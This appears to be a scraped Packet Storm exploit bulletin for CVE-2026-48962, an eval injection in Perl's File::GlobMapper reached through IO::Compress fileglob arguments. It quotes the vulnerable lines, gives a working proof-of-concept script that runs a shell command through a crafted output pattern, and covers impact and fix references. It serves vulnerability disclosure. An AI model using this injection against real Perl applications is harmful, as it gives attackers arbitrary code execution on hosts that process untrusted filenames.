{“lastseen”:”2026-06-10T16:00:05″,”description”:”An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to execute arbitrary Perl code in the…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 IO-Compress 2.219 Eval Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223138″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-48962″],”sourceData”:”### Summary\\n \\n An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.\\n No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.\\n \\n —\\n \\n ### Details\\n \\n `File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without\\n any sanitisation:\\n \\n **`lib\/File\/GlobMapper.pm:316\u2013321`**\\n “`perl\\n $string =~ s\/${noPreBS}#(\\\\d)\/\\\\${$1}\/g;\\n $string =~ s#${noPreBS}\\\\*#\\\\${inFile}#g;\\n $string = ‘\\”‘ . $string . ‘\\”‘; # wrapped in double-quotes\\n $self-\\u003e{OutputPattern} = $string; # stored verbatim \u2014 no escaping\\n “`\\n \\n **`lib\/File\/GlobMapper.pm:342`**\\n “`perl\\n eval \\”\\\\$outFile = $self-\\u003e{OutputPattern};\\” ; # executed \u2014 injection point\\n “`\\n \\n `File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` \/ `IO::Uncompress::*` function are fileglob strings (delimited by `\\u003c \\u003e`). This is a documented, common calling\\n convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.\\n \\n Any character that closes the surrounding double-quoted Perl string \u2014 a literal `\\”`, a backtick, `${…}`, or `@{…}` \u2014 followed by arbitrary Perl code is executed verbatim.\\n \\n —\\n \\n ### PoC\\n \\n Save as `poc.pl` and run with `perl poc.pl`:\\n \\n “`perl\\n #!\/usr\/bin\/perl\\n use strict;\\n use warnings;\\n use File::Temp qw(tempdir);\\n use IO::Compress::Gzip qw(gzip);\\n \\n my $dir = tempdir(CLEANUP =\\u003e 1);\\n my $sentinel = \\”\/tmp\/CVE_GlobMapper_RCE_$$\\”;\\n \\n # Create a legitimate input file that the input glob will match\\n open my $fh, ‘\\u003e’, \\”$dir\/test.txt\\” or die $!;\\n print $fh \\”data\\\\n\\”;\\n close $fh;\\n \\n my $malicious = qq(\\u003c$dir\/out.gz\\”; system(\\”touch $sentinel\\”); #\\u003e);\\n \\n print \\”Sentinel before: \\”, (-e $sentinel ? \\”EXISTS\\” : \\”absent\\”), \\”\\\\n\\”;\\n \\n eval { gzip \\”\\u003c$dir\/*.txt\\u003e\\” =\\u003e $malicious };\\n \\n if (-e $sentinel) {\\n print \\”EXPLOITED \u2014 arbitrary command executed via eval injection\\\\n\\”;\\n print \\”Sentinel: $sentinel\\\\n\\”;\\n unlink $sentinel;\\n } else {\\n print \\”Did not fire (check error: $@)\\\\n\\”;\\n }\\n “`\\n \\n **Expected output:**\\n “`\\n Sentinel before: absent\\n EXPLOITED \u2014 arbitrary command executed via eval injection\\n Sentinel: \/tmp\/CVE_GlobMapper_RCE_\\u003cpid\\u003e\\n “`\\n \\n Confirmed on IO-Compress 2.219 \/ Perl 5.40.1 \/ Ubuntu 26.04.\\n \\n —\\n \\n ### Impact\\n \\n This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.\\n \\n **Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input – such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.\\n \\n In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (\u2248 2005) and is present on every Linux distribution that ships the `perl` package.\\n \\n \\n ### References\\n \\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-48962\\n – https:\/\/github.com\/pmqs\/IO-Compress\/commit\/f2db247bf90d4cc7ee2710be384946081f3b4610.patch\\n – https:\/\/github.com\/pmqs\/IO-Compress\/issues\/73\\n – https:\/\/metacpan.org\/release\/PMQS\/IO-Compress-2.220\/changes\\n – http:\/\/www.openwall.com\/lists\/oss-security\/2026\/05\/27\/4\\n – https:\/\/github.com\/advisories\/GHSA-q6wx-vhvq-x7h6″,”sourceHref”:”https:\/\/packetstorm.news\/download\/223138″,”cvss”:{“score”:7.3,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223138\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-10T16:00:05″,”description”:”An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,47,12,15,13,53,7,11,5],"class_list":["post-61679","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-73","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n